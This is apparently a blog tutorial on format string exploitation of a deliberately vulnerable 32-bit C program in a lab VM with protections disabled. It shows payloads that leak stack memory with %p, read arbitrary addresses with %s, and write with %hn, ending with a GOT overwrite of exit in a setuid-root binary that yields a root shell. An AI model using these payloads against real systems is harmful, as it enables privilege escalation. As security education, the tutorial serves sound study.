To follow this post you may need a modicum of C know-how as well as some familiarity with gdb. In regards to compile flags, we’re using -g to include debugging information (which will be used by gdb) and -m32 to compile to 32 bits (I’m using a 64 bits machine and you probably are too) - but 32 bit is easier to understand.

I’ll also be using the -fno-stack-protector option which is enabled by default on modern versions of gdb and ASLR (Address Space Layout Randomisation) has been disabled via sudo echo 0 | tee /proc/sys/kernel/randomize_va_space and making the stack executable with -z execstack.

Note that I am supressing warnings with the -w flag - that’s intentional and solely for the purpose of this exercise!

printf calling convention

Let’s start by looking at how printf is called from an assembly perspective. Here’s the C code:

#include <stdlib.h>

main(int argc, char* argv[])
  unsigned int var = 0xAAAAAAAA;
  char buffer[512];
  strcpy(buffer, argv[1]);

  printf("Caller passed in string %s, var is located at 0x%08x", buffer, &var);


Let’s compile that and check the corresponding assembly in gdb:

vagrant@vagrant:~/scratch$ gcc -m32 -g -fno-stack-protector -w printf_c.c
vagrant@vagrant:~/scratch$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) list 10
5       main(int argc, char* argv[])
6       {
7         unsigned int var = 0xAAAAAAAA;
8         char buffer[512];
9         strcpy(buffer, argv[1]);
11        printf("Caller passed in string %s, var is located at 0x%08x", buffer, &var);
12        printf("\n");
14        exit(0);
(gdb) break 11
Breakpoint 1 at 0x80484d3: file printf_c.c, line 11.
(gdb) set disassemble-next-line on
(gdb) run foo
Starting program: /home/vagrant/scratch/a.out foo

Breakpoint 1, main (argc=2, argv=0xffffdc24) at printf_c.c:11
11        printf("Caller passed in string %s, var is located at 0x%08x", buffer, &var);
=> 0x080484d3 <main+56>:        83 ec 04                sub    esp,0x4
   0x080484d6 <main+59>:        8d 45 f4                lea    eax,[ebp-0xc]
   0x080484d9 <main+62>:        50                      push   eax
   0x080484da <main+63>:        8d 85 f4 fd ff ff       lea    eax,[ebp-0x20c]
   0x080484e0 <main+69>:        50                      push   eax
   0x080484e1 <main+70>:        68 90 85 04 08          push   0x8048590
   0x080484e6 <main+75>:        e8 55 fe ff ff          call   0x8048340 <printf@plt>
   0x080484eb <main+80>:        83 c4 10                add    esp,0x10

We see that we push 3 things on top of the stack before the call. Let’s see those in more details:

(gdb) break *0x080484e6
Breakpoint 2 at 0x80484e6: file printf_c.c, line 11.
(gdb) set disassemble-next-line off
(gdb) c

Breakpoint 2, 0x080484e6 in main (argc=2, argv=0xffffdc24) at printf_c.c:11
11        printf("Caller passed in string %s, var is located at 0x%08x", buffer, &var);
(gdb) x/4wx $esp
0xffffd950:     0x08048590      0xffffd96c      0xffffdb6c      0xf7fefe7a
(gdb) x/s 0x08048590
0x8048590:      "Caller passed in string %s, var is located at 0x%08x"
(gdb) x/s 0xffffd96c
0xffffd96c:     "foo"
(gdb) x/x 0xffffdb6c
0xffffdb6c:     0xaa
(gdb) x/4x 0xffffdb6c
0xffffdb6c:     0xaa    0xaa    0xaa    0xaa

As we can see, we have 3 addresses - each corresponding to an argument given to printf. The string to be interpolated is pushed first, and the arguments next.

printf takes a variable number of arguments thought. So how does it know what to look for on the stack? It parses the format string.

Reading arbitrary addresses

As we saw above, printf expects all its arguments (determined by the format string) to be on the stack - and when they’re passed in properly that works just fine. But sometimes people are forgetfull and end up doing the following:

#include <stdlib.h>
#include <stdio.h>

main(int argc, char* argv[])
  char buffer[512];
  strcpy(buffer, argv[1]);



Which works as expected as long as the caller does not include a format string:

vagrant@vagrant:~/scratch$ gcc -m32 -g -fno-stack-protector -w printf_c.c
vagrant@vagrant:~/scratch$ ./a.out hello
vagrant@vagrant:~/scratch$ ./a.out hello%08x

So what just happened? printf parsed the format string and decided it needed an extra argument - and just took the next item on the stack and displayed it as a 4-bytes word. Let’s try that again with a more contrived example:

vagrant@vagrant:~/scratch$ ./a.out DDDD$(perl -e "print '%p..'x12")

The 0x44444444 looks suspicious, and so does the repeating 0x2e2e7025. Sure enough:

vagrant@vagrant:~/scratch$ printf "\x44\x44\x44\x44\n"
vagrant@vagrant:~/scratch$ printf "\x2e\x2e\x70\x25\n"

Do remember we’re using little-endian, so the bytes are printed backwards. Unlike the first example where the format string was located at 0x08048590, this time it has been placed fully on the stack! And as we walk down the stack we encounter what we put on it - meaning we can force printf to use our input as arguments.

This unfortunately means we cannot read past our input using %p - but we can trick printf into reading a string at a memory location of our choosing. If we use the %s format, printf will use what’s on the stack as the address of a string and will read until a null byte is found. But what shall we read? Let’s try an environment variable.

Now gdb does some funky stuff meaning the environment we execute under differs to the one outside. Thankfully there’s something we can do about it but it’s a little messy (I’m sure there must be a better way). We’ll use env -i to ignore the current environment. Let’s also figure out where we need to place our %s:

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "DDDD" + "%p.."*5')

This means we should have 3 %p before adding our %s - which, as it stands, would cause printf to try and read the string located at 0x44444444 which sure enough, segfaults:

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "DDDD" + "%p.."*3 + "%s"')
Segmentation fault (core dumped)

We need to figure out where our environment variable is located:

vagrant@vagrant:~/scratch$ env -i PWD=$(pwd) SOME_VAR=foobar gdb -q --args /home/vagrant/scratch/a.out $(python -c 'print "DDDD" + "%p.."*3 + "%s"')
Reading symbols from /home/vagrant/scratch/a.out...done.
(gdb) show env

Despite env -i, gdb still added stuff! Okay let’s add that to our environment too.

vagrant@vagrant:~/scratch$ env -i PWD=$(pwd) SOME_VAR=foobar LINES=29 COLUMNS=211 gdb -q --args /home/vagrant/scratch/a.out $(python -c 'print "DDDD" + "%p.."*3 + "%s"')
Reading symbols from /home/vagrant/scratch/a.out...done.
(gdb) show env
(gdb) break main
Breakpoint 1 at 0x80484b1: file printf_c.c, line 8.
(gdb) r
Starting program: /home/vagrant/scratch/a.out DDDD%p..%p..%p..%s

Breakpoint 1, main (argc=2, argv=0xffffde84) at printf_c.c:8
8         strcpy(buffer, argv[1]);
(gdb) x/4s *environ
0xffffdf9d:     "SOME_VAR=foobar"
0xffffdfad:     "COLUMNS=211"
0xffffdfb9:     "PWD=/home/vagrant/scratch"
0xffffdfd3:     "LINES=29"
(gdb) p/x 0xffffdf9d+9
$1 = 0xffffdfa6

Again gdb makes things a little more difficult - the order of the variables differs from the one we specified. It just means we need to call our binary with the vars in that order - and SOME_VAR will be located at 0xffffdf9d + 9 bytes (one for each character of SOME_VAR=). We’re now ready to run this:

vagrant@vagrant:~/scratch$ env -i SOME_VAR=foobar COLUMNS=211 LINES=29 PWD=/home/vagrant/scratch /home/vagrant/scratch/a.out $(python -c 'print "\xa6\xdf\xff\xff" + "%p.."*3 + "%s"')


The astute reader would have pointed out this would have been much simpler using getenv but I was hell bent on getting this to work with gdb. Heh.

Writing to an arbitrary address

printf has a little known format parameter - %n - that writes the number of bytes written so far. The argument it takes is a memory address - something we know we can control.

#include <stdlib.h>
#include <stdio.h>

main(int argc, char* argv[])
  unsigned int var = 0xAAAAAAAA;
  char buffer[512];
  strcpy(buffer, argv[1]);
  printf("var = 0x%08x and is located at %p\n", var, &var);

We can see use this to overwrite an address with a different value:

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "DDDD"+"%08x"*6 + "%p"')
var = 0xaaaaaaaa and is located at 0xffffdb1c
vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "\x1c\xdb\xff\xff"+"%08x"*6 + "%n"')
var = 0x00000034 and is located at 0xffffdb1c

The %n modifier writes 32 bits which is a little unwildly. We can use h to write half (16 bits) instead.

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "\x1c\xdb\xff\xff"+"%08x"*6 + "%hn"')
var = 0xaaaa0034 and is located at 0xffffdb1c

Instead of overwriting the target address with a 32 bit value, we’ll overwrite the upper and lower halves separately. This means we’ll use 2 %hn modifiers - the first will write to <address> and the second to <address+2> - for a total of 32 bits.

printf can also take positional arguments - so printf("$2s, $1s", "first arg", "second arg") would print second arg, first arg. We will replace the %08x padding with this - it’s equivalent (as in printf will jump down the stack) and saves space in the format string (in case our user input is limited). After some trial and error we have:

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "DDDDEEEE" + "%00000x%7$p%00000x%8$p"')
var = 0xaaaaaaaa and is located at 0xffffdb1c

So our addresses are located at the 7th and 8th position. We replace p with hn and as expected we get a seg fault - the addresses0x44444444 and 0x45454545 are not ours.

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "DDDDEEEE" + "%00000x%7$hn%00000x%8$hn"')
Segmentation fault (core dumped)

We use var’s address instead:

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "\x1c\xdb\xff\xff\x1e\xdb\xff\xff" + "%00000x%7$hn%00000x%8$hn"')
var = 0x00180010 and is located at 0xffffdb1c

Okay - getting there. We know that by the time we get to the first hn we would have already written 8 bytes - so we want to write an additional 0xdd5a - 8 for the first part and 0xffff - 0xdd5a for the second:

(gdb) p 0xdd5a - 8
$42 = 56658
(gdb) p 0xffff - 0xdd5a
$43 = 8869

And we see that it does work:

vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "\x1c\xdb\xff\xff\x1e\xdb\xff\xff" + "%56658x%7$hn%08869x%8$hn"')
var = 0xffffdd5a and is located at 0xffffdb1c

Now instead of writing this to var’s address, we need something useful. There’s no point printing our shellcode to screen. Simliar to a buffer overflow we want to override something exectuable - and it turns out there’s just the thing. Our binary calls a number of functions defined in libc. In our case we call exit at the end. We can see where the address for that function gets loaded - and by overwriting that with the address of our shellcode, we can get this executed instead:

vagrant@vagrant:~/scratch$ objdump -R a.out | grep exit
0804a014 R_386_JUMP_SLOT   exit@GLIBC_2.0

Assuming our executable was owned by root and had the sticky bit set, we’d get an escalated shell:

vagrant@vagrant:~/scratch$ sudo chown root a.out
vagrant@vagrant:~/scratch$ sudo chmod u+s a.out
vagrant@vagrant:~/scratch$ id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
vagrant@vagrant:~/scratch$ /home/vagrant/scratch/a.out $(python -c 'print "\x14\xa0\x04\x08\x16\xa0\x04\x08" + "%56658x%7$hn%08869x%8$hn"')
var = 0xaaaaaaaa and is located at 0xffffdb1c
# id
uid=0(root) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

Conclusion and references

Don’t forget that your shellcode is still on the stack - and it needs to be executable!